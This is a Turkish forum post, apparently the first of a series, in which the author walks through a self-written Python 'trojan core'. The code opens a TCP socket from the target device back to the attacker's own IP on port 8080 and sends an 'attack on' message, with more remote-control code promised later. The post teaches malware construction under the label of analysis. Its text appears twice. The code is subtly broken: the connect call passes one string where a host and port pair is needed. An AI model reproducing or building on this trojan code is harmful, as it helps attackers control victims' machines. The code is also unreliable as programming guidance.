Herkese selam olsun...
Bir önceki konumuzda keylogger incelemesi yapmıştık buradan ulaşabilirsiniz. Şimdi ise aynı analizi trojan için yapacağız.
Trojan nedir ne değildir bir çoğunuz biliyorsunuzdur bilmeyenler küçük bir araştırma ile öğrenebilir en kabaca zararlı bir yazılım olarak değerlendirebilirsiniz.
Bir sorun yoksa konumuza geçelim
Bu konumuz iki bölümden oluşacak ilk bölümde trojanimizin çekirdek kısmını ikinci kısmında ise yönetme komutları ile beraber inceleyeceğiz.
İlk bölümümüz ile başlayalım
Aşağıda benim kendim yazdığım bir trojan çekirdeği var. Bu zararlı casus yazılımın nasıl işlediğini bu trojan üzerinden inceleyelim.
İlk kodumuzla başlayalım:
İmport ile socket modülümüzü çağırdık.
Bir sonraki kodumuz:
Bağlantı ismi ile bir değişken atadık ve socket içinde bulunan socket fonksiyonunu kullanıyoruz ve içerisine ipV4 ile yapacağımız için socket.AF_INET yazıyoruz ama ipV6 kullanacak olsaydık socket.AF_INET6 yazacaktık. Şuan ipV4 için yazıyoruz. Daha sonra bağlantı mantığımızı Stream ile belirtiyoruz. Stream tisipidir bunu da bilmemiz gerekiyor. DGRA da var fakat biz tisipi kullandığımız için stream yazıyoruz.
Bir sonraki kodumuz:
Bu kodumuzda değişkenimizin içinde ki connet fonksiyonu ile özellikleri ayarlayacağız. Hedef cihazı kendi cihazımıza bağlayacağımız için ip adresimizi girmemiz gerekiyor ama bu pek güvenli değil. Bunun için farklı bir konu açacağım şuan inceleme yapıyoruz. İp adresimizi belirttikten sonra portu seçiyoruz. 8080 girebilirsiniz attack sırasında bunu da kontrol etmeniz gerekecek.
Bir sonraki kodumuz:
Değişkenimizi yazıyoruz ve send fonksiyonu ile elimizde ki dosyayı ekliyoruz. Ben attack on yazdım. \n ekledim düzen için. Son olarak .encode("utf-8") ekliyoruz hata almamak için.
İlk bölümde çekirdeği inceledik. Bir sonraki bölümde ise yönetim kodları ile bir bütün olarak inceleyeceğiz.
Okuduğunuz için teşekkür ederim arkadaşlar.
İyi Forumlar İyi Nöbetler
Bir önceki konumuzda keylogger incelemesi yapmıştık buradan ulaşabilirsiniz. Şimdi ise aynı analizi trojan için yapacağız.
Trojan nedir ne değildir bir çoğunuz biliyorsunuzdur bilmeyenler küçük bir araştırma ile öğrenebilir en kabaca zararlı bir yazılım olarak değerlendirebilirsiniz.
Bir sorun yoksa konumuza geçelim
Bu konumuz iki bölümden oluşacak ilk bölümde trojanimizin çekirdek kısmını ikinci kısmında ise yönetme komutları ile beraber inceleyeceğiz.
İlk bölümümüz ile başlayalım
Aşağıda benim kendim yazdığım bir trojan çekirdeği var. Bu zararlı casus yazılımın nasıl işlediğini bu trojan üzerinden inceleyelim.
Python:
import socket
baglanti = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
baglanti.connect(("ip adresimiz,8080"))
baglanti.send("attack on\n".encode("utf-8"))İlk kodumuzla başlayalım:
Python:
import socketİmport ile socket modülümüzü çağırdık.
Bir sonraki kodumuz:
Python:
baglanti = socket.socket(socket.AF_INET,socket.SOCK_STREAM)Bağlantı ismi ile bir değişken atadık ve socket içinde bulunan socket fonksiyonunu kullanıyoruz ve içerisine ipV4 ile yapacağımız için socket.AF_INET yazıyoruz ama ipV6 kullanacak olsaydık socket.AF_INET6 yazacaktık. Şuan ipV4 için yazıyoruz. Daha sonra bağlantı mantığımızı Stream ile belirtiyoruz. Stream tisipidir bunu da bilmemiz gerekiyor. DGRA da var fakat biz tisipi kullandığımız için stream yazıyoruz.
Bir sonraki kodumuz:
Python:
baglanti.connect(("ip adresimiz,8080"))Bu kodumuzda değişkenimizin içinde ki connet fonksiyonu ile özellikleri ayarlayacağız. Hedef cihazı kendi cihazımıza bağlayacağımız için ip adresimizi girmemiz gerekiyor ama bu pek güvenli değil. Bunun için farklı bir konu açacağım şuan inceleme yapıyoruz. İp adresimizi belirttikten sonra portu seçiyoruz. 8080 girebilirsiniz attack sırasında bunu da kontrol etmeniz gerekecek.
Bir sonraki kodumuz:
Python:
baglanti.send("attack on\n".encode("utf-8"))Değişkenimizi yazıyoruz ve send fonksiyonu ile elimizde ki dosyayı ekliyoruz. Ben attack on yazdım. \n ekledim düzen için. Son olarak .encode("utf-8") ekliyoruz hata almamak için.
İlk bölümde çekirdeği inceledik. Bir sonraki bölümde ise yönetim kodları ile bir bütün olarak inceleyeceğiz.
Okuduğunuz için teşekkür ederim arkadaşlar.
İyi Forumlar İyi Nöbetler
